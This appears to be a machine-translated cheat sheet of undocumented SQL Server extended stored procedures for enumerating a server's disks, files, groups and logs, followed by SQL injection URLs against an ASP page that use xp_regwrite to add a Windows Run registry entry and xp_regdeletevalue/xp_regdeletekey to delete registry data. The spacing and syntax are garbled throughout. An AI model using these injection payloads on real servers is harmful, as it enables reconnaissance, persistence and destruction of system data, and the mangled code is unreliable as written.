SQL Server Stored Procedure Extension

-- Obtain the version number of MS SQL
Execute master .. sp_msgetversion

-- Obtain the hard disk file information
-- Parameter description: directory name, directory depth, and whether to display files
Execute master .. xp_dirtree 'C :'
Execute master .. xp_dirtree 'C: ', 1
Execute master .. xp_dirtree 'C: ', 1, 1

-- List all provided by oledb installed on the serverProgram
Execute master .. xp_enum_oledb_providers

-- List all installed on the serverCodePage
Execute master .. xp_enumcodepages

-- List the DSN configured on the server
Execute master .. xp_enumdsn

-- List the SQL server error logs and the last update time
Execute master .. xp_enumerrorlogs

-- List all Windows Local Groups on the server
Execute master .. xp_enumgroups

-- Check file existence
Execute master .. xp_fileexist 'C: \ A. Bak'

Declare @ flag int

Exec master.. xp_fileexist 'C: \ ABC. Bak', @ flag out

If @ flag = 1
Begin
Print 'exist'
End
Else
Begin
Print 'no exist'
End

-- List the fixed drives on the server and the available space for each drive
Execute master .. xp_fixeddrives

-- Obtain the computer name of the current SQL Server server.
Execute master .. xp_getnetname

-- List the specific content of the current Error Log
Exec [Master]. [DBO]. [xp_readerrorlog]

-- List all sub-directories under a specified directory
Exec [Master]. [DBO]. [xp_subdirs] 'C: \ WINNT'

--- List drive names
-- Low free space in bytes)
-- Drive type: Hard Drive (1), Hard Drive (2), CD-Rom (8)
Exec [Master]. [DBO]. [xp_availablemedia]
-- The effect is as follows:

Name low free high free media type
C: \ 1270386688 0 2
D: \ 1726824448 2 2
E: \ 875053056 10 2
F: \ 0 0 8

The [Master]. [DBO]. [sp_addlogin] contains the encryption function pwdencrypt. If you are interested, try again.

SQL Server contains several extended stored procedures that can access the system registry. However, these extended stored procedures are not made public, and they have been available since SQL Server 7.0,
They are retained in SQL Server 2000 and may be deleted later. However, these stored procedures provide the ability to access the system registry in the current SQL Server version,
In addition, many people often use these extended stored procedures when using SQL Server to attack the system, so it is best to disable them in SQL Server.
Http: // 127.0.0.1/view. asp? Id = 165
If SQL injection of MSSQL exists
Xp_regwrite write to the Registry
Usage:
Xp_regwrite Root Key, subkey, Value Name, value type, Value
Http: // 127.0.0.1/view. asp? Id = 165; Exec master. DBO. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run', 'testvaluename', 'reg _ SZ ', 'Hello'
Note that there are two value types: REG_SZ and REG_DWORD.

Xp_regdeletevalue delete a value
Usage:
Xp_regdeletevalue Root Key, subkey, Value Name
Http: // 127.0.0.1/view. asp? Id = 165; Exec master. xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename'

Xp_regdeletekey: delete key, including all values under this key

usage:
http: // 127.0.0.1/view. asp? Id = 165; Exec master. xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ testkey'